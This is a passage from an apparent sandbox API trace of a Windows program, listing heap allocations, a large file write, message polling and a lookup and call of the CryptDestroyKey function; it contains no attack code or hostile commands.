[0183.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0183.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0183.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc4068) returned 0xf30020 [0183.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0183.770] WriteFile (in: hFile=0x2d0, lpBuffer=0xf30020*, nNumberOfBytesToWrite=0xc4068, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0xf30020*, lpNumberOfBytesWritten=0x8cf5e4*=0xc4068, lpOverlapped=0x0) returned 1 [0183.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0183.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xf30020 | out: hHeap=0x970000) returned 1 [0183.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0183.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0183.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0183.928] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0183.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0183.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0183.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0183.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0183.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0183.928] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0183.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0183.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0183.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0183.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0183.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0183.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0183.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0183.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50530 [0183.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0183.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0183.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0183.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0183.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0183.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0183.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0183.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0183.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff10 [0183.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0183.929] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0183.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff10 | out: hHeap=0x970000) returned 1 [0183.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0183.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0183.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ec8 [0183.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0183.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0183.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0183.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0183.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0183.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0183.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0183.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0183.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0183.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0183.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0183.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0183.930] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0183.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0183.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0183.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0183.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0183.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0183.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0183.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0183.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0183.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0183.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0183.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0183.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0183.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0183.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0183.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0183.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0183.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0183.930] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0183.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0183.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0183.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0183.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0183.930] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0183.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0183.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0183.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0183.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0183.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0183.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0183.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0183.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0183.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0183.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0183.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0183.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0183.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0183.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0183.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0183.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0183.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0183.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0183.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0183.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0183.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0183.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0183.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0183.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0183.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0183.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0183.931] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0183.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0183.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0183.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0183.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0183.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0183.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0183.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0183.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0183.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0183.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0183.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0183.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0183.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0183.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0183.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0183.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0183.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0183.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0183.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0183.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0183.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0183.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0183.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e50830, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0183.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0183.932] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0183.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0183.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0183.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0183.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0183.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0183.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0183.933] CryptDestroyKey (hKey=0xa87250) returned 1 [0183.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0183.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0183.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0183.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0183.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0183.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0183.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0183.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0183.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0183.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0183.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0183.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0183.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0183.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0183.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0183.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0183.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0183.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0183.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0183.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0183.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0183.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0183.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0183.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0183.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0183.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0183.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0183.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0183.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0183.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0183.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0183.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0183.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0183.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0183.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0183.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0183.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0183.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0183.934] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0183.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0183.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0183.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0183.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0183.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0183.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0183.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0183.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0183.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0183.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0183.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0183.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0183.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0183.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0183.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0183.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0183.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0183.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0183.935] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0183.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0183.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0183.935] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0183.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0183.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0183.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0183.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0183.935] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0183.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0183.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0183.936] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0183.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0183.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0183.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0183.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0183.936] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0183.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0183.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0183.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0183.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0183.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0183.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0183.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0183.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0183.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0183.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0183.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0183.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0183.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0183.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0183.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0183.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0183.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0183.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0183.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0183.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0183.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0183.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0183.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0183.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0183.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0183.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0183.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0183.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0183.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0183.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0183.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0183.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0183.937] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 